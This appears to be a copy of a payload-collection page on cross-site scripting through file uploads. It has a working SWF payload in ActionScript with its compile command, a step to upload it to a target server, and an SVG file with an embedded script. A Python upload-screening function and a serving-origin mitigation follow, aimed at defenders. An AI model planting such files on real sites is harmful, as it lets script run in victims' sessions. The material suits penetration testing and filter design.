https://github.com/MMquant/PayloadsAllTheThings/tree/master/XSS%20injection

Create XSS vulnerability via SWF file upload

The payload is ActionScript that embeds JavaScript and is compiled into a SWF file.
The file is uploaded, and when the browser loads it, the embedded JavaScript executes.

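ActionScript2 code:
class XSS {
  static var app: XSS;
  function XSS() {
    // javascript: URL handed to getURL is executed by the browser
    var xss = "javascript:alert(\"SWF-based XSS: \"+document.domain)";
    getURL(xss, "_self");
  }
  // entry point selected by the mtasc -main switch
  static function main(mc) {
    app = new XSS();
  }
}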

Compile to SWF with /root/Programs/mtasc/mtasc:
mtasc -swf swfxss.swf -main -header 0:0:0 swfxss.as

Upload swfxss.swf to target server

Create XSS vulnerability via SVG file upload

An SVG is an XML file, so it can carry a <script> element:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
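
Defender-side check for both upload types above, as an added example that is not part of the original notes: it rejects Flash files by magic bytes and parses SVG to find script elements, event-handler attributes and javascript: links. The names screen_upload and local and the SAMPLE_* inputs are hypothetical and constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")  # uncompressed, zlib and LZMA Flash headers
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}

# Constructed sample inputs (SAMPLE_SVG mirrors the structure of the SVG above).
SAMPLE_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain);</script></svg>'
SAMPLE_CLEAN = b'<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0"/></svg>'
SAMPLE_SWF = b"FWS" + b"\x0a" + b"\x00" * 8


def local(name):
    """Strip an XML namespace prefix: '{ns}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def screen_upload(data: bytes) -> list:
    """Return reasons to reject an upload; an empty list means nothing was found."""
    if data[:3] in SWF_MAGIC:
        return ["flash: SWF magic bytes"]
    if b"<svg" not in data[:4096].lower():
        return []  # not SVG; other file types are out of scope for this check
    if re.search(rb"<!ENTITY", data, re.I):
        return ["svg: DTD entity declaration"]  # avoid entity-expansion tricks
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["svg: not well-formed XML"]
    reasons = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            reasons.append(f"svg: <{tag}> element")
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):
                reasons.append(f"svg: event handler {name} on <{tag}>")
            url = re.sub(r"[\s\x00-\x1f]", "", value).lower()
            if name in ("href", "src") and url.startswith("javascript:"):
                reasons.append(f"svg: javascript: URL in {name} on <{tag}>")
    return reasons
```

Content screening is one layer only: serving uploads from a separate origin with Content-Disposition: attachment keeps a file that slips through from running in the application's origin.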